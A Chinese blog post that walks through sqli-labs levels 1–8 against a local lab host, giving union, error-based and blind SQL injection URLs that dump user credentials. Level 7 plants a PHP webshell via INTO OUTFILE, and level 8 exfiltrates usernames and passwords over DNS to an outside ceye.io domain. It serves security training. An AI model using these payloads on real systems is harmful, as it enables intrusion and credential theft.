当前位置: 首页 > news >正文

sqli(1-8)

news 2025/7/21 0:24:05

第一关

判断数据类型      http://192.168.37.1/sqli/Less-1/?id=1 --+        字符型      '

判断回显数量      http://192.168.37.1/sqli/Less-1/?id=1' order by 3--+       3个

判断回显位置     http://192.168.37.1/sqli/Less-1/?id=-1' union select 1,2,3--+

判断数据库名称   http://192.168.37.1/sqli/Less-1/?id=-1' union select 1,2,database();--+

查找数据库的表和列   

 http://192.168.37.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database();--+

http://192.168.37.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database();--+

查找数据   

 http://192.168.37.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(username,password) from users;--+

第二关

一, http://192.168.37.1/sqli/Less-2/?id=1                    数字型

二    http://192.168.37.1/sqli/Less-2/?id=1 order by 3--+

三     http://192.168.37.1/sqli/Less-2/?id=-1 union select 1,2,3--+

四   http://192.168.37.1/sqli/Less-2/?id=-1 union select 1,2,database();--+

五   http://192.168.37.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database();--+

http://192.168.37.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database();--+

六    http://192.168.37.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(username,password) from users --+

第三关

一   http://192.168.37.1/sqli/Less-3/?id=1') --+   字符型 并且闭合方式为')

二  http://192.168.37.1/sqli/Less-3/?id=1') order by 3--+

三   http://192.168.37.1/sqli/Less-3/?id=-1') union select 1,2,3--+

四   http://192.168.37.1/sqli/Less-3/?id=-1') union select 1,2,database();--+

五   http://192.168.37.1/sqli/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database();--+

http://192.168.37.1/sqli/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database();--+

六   http://192.168.37.1/sqli/Less-3/?id=-1') union select 1,2,group_concat(username,password) from users;--+

第四关

一  http://192.168.37.1/sqli/Less-4/?id=1") and 1=2; --+   字符型  闭合方式为")

二 http://192.168.37.1/sqli/Less-4/?id=1") order by 3 --+

三   http://192.168.37.1/sqli/Less-4/?id=-1") union select 1,2,3 --+

四   http://192.168.37.1/sqli/Less-4/?id=-1") union select 1,2,database() --+

五   http://192.168.37.1/sqli/Less-4/?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database();--+

http://192.168.37.1/sqli/Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database();--+

六   http://192.168.37.1/sqli/Less-4/?id=-1") union select 1,2,group_concat(password,username) from users;--+

第五关(无回显)

一   http://192.168.37.1/sqli/Less-5/?id=1' and 1=2 --+  字符型 闭合方式 ' 

二  http://192.168.37.1/sqli/Less-5/?id=1' order by 3 --+

三  http://192.168.37.1/sqli/Less-5/?id=-1' union select 1,2,extractvalue("doc",concat("~",(select database()))) --+   因为无回显位置,所以需要进行报错注入

四  http://192.168.37.1/sqli/Less-5/?id=-1' union select 1,2,extractvalue("doc",concat("~",(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

http://192.168.37.1/sqli/Less-5/?id=-1' union select 1,2,extractvalue("doc",concat("~",(select group_concat(column_name) from information_schema.columns where table_schema=database()))) --+

五  http://192.168.37.1/sqli/Less-5/?id=1' union select 1,2,extractvalue("doc",concat("~",substring((select group_concat(username,password) from users),15,25))) --+   

 http://192.168.37.1/sqli/Less-5/?id=1' union select 1,2,updatexml("doc",concat("~",substring((select group_concat(username,password) from users),15,25)),"aaa") --+

因为数据在一行中不能全部显示,所以使用substring函数查询

报错函数extractvalue ,updatexml,floor

第六关

一  http://192.168.37.1/sqli/Less-6/?id=1" and 1=2 --+ 字符型 闭合方式 "

二  http://192.168.37.1/sqli/Less-6/?id=1" order by 3 --+

三   http://192.168.37.1/sqli/Less-6/?id=1" union select 1,2,extractvalue("doc",concat("~",(select database()))) --+

四   http://192.168.37.1/sqli/Less-6/?id=1" union select 1,2,extractvalue("doc",concat("~",(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

http://192.168.37.1/sqli/Less-6/?id=1" union select 1,2,extractvalue("doc",concat("~",(select group_concat(column_name) from information_schema.columns where table_schema=database()))) --+

五   http://192.168.37.1/sqli/Less-6/?id=1" union select 1,2,extractvalue("doc",concat("~",substring((select group_concat(username,password) from users),5,25))) --+

第七关  

一  http://192.168.37.1/sqli/Less-7/?id=1')) and 1=2--+ 字符型  闭合方式 '))

二   http://192.168.37.1/sqli/Less-7/?id=1')) order by 3--+

三  http://192.168.37.1/sqli/Less-7/?id=1')) union select 1,2,extractvalue("doc",concat("~",(select database())))--+

四  http://192.168.37.1/sqli/Less-7/?id=1')) union select 1,2,extractvalue("doc",concat("~",(select group_concat(table_name) from information_schema.tables where table_schema=database())))--+

http://192.168.37.1/sqli/Less-7/?id=1')) union select 1,2,extractvalue("doc",concat("~",(select group_concat(column_name) from information_schema.columns where table_schema=database())))--+

五  http://192.168.37.1/sqli/Less-7/?id=1')) union select 1,2,extractvalue("doc",concat("~",substring((select group_concat(username,password) from users),15,25))) --+

或者使用工具蚁剑连接

http://192.168.37.1/sqli/Less-7/?id=-1')) union select 1,"<?php @eval($_POST['password']);?>",3 into outfile "E:\wang_an\huan_jing\Xiaopimianban\phpstudy_pro\WWW\benben.php" --+

通过一句话木马连接拿到数据

第八关

一  http://192.168.37.1/sqli/Less-8/?id=1' and 1=2 --+ 字符型  闭合方式 '

二http://192.168.37.1/sqli/Less-8/?id=1' and (select length(database())=8) --+判断数据库名称长度

三  http://192.168.37.1/sqli/Less-8/?id=1' and ascii(substring(database(),1,1))=115 --+通过acs码猜测数据库的名称,最终得到名称security(也可通过python代码实现)

四 http://192.168.37.1/sqli/Less-8/?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1)))=6 --+ 判断表名长度

http://192.168.37.1/sqli/Less-8/?id=1' and load_file(concat("\\\\",(select database()),".zclf47.ceye.io\\abcd")); --+

http://192.168.37.1/sqli/Less-8/?id=1' and load_file(concat("\\\\",(select username from users limit 2,1),".zclf47.ceye.io")); --+

http://192.168.37.1/sqli/Less-8/?id=1' and load_file(concat("\\\\",(select password from users limit 2,1),".zclf47.ceye.io")); --+

http://www.dtcms.com/a/285593.html

相关文章:

  • ASP.NET Core Web API 内存缓存(IMemoryCache)入门指南
  • Pytorch下载Mnist手写数据识别训练数据集的代码详解
  • PyTorch新手实操 安装
  • 填坑 | React Context原理
  • SpringMVC + Tomcat10
  • 小结:Spring MVC 的 XML 的经典配置方式
  • 计算机视觉与机器视觉
  • Tensorflow小白安装教程(包含GPU版本和CPU版本)
  • C++并发编程-13. 无锁并发队列
  • div和span区别
  • 【Python】python 爬取某站视频批量下载
  • 前端实现 web获取麦克风权限 录制音频 (需求:ai对话问答)
  • 20250718【顺着234回文链表做两题反转】Leetcodehot100之20692【直接过12明天吧】今天计划
  • AugmentCode还没对个人开放?
  • STL—— list迭代器封装的底层讲解
  • 71 模块编程之新增一个字符设备
  • Proto文件从入门到精通——现代分布式系统通信的基石(含实战案例)
  • 标题 “Python 网络爬虫 —— selenium库驱动浏览器
  • 光伏电站工业通信网络解决方案:高可靠工业通信架构与设备选型
  • 开源短链接工具 Sink 无需服务器 轻松部署到 Workers / Pages
  • 西门子工业软件全球高级副总裁兼大中华区董事总经理梁乃明先生一行到访庭田科技
  • ArcGIS Pro+PS 实现地形渲染效果图
  • WinDbg命令
  • FastAdmin框架超级管理员密码重置与常规admin安全机制解析-卓伊凡|大东家
  • 本地部署DeepSeek-R1并打通知识库
  • 数字地与模拟地隔离
  • 【C语言】深入理解柔性数组:特点、使用与优势分析
  • Cursor替代,公测期间免费使用Claude4
  • 首个直播流扩散(LSD)AI模型:MirageLSD,它可以实时把任意视频流转换成你的自定义服装风格——虚拟换装新体验
  • mpiigaze的安装过程一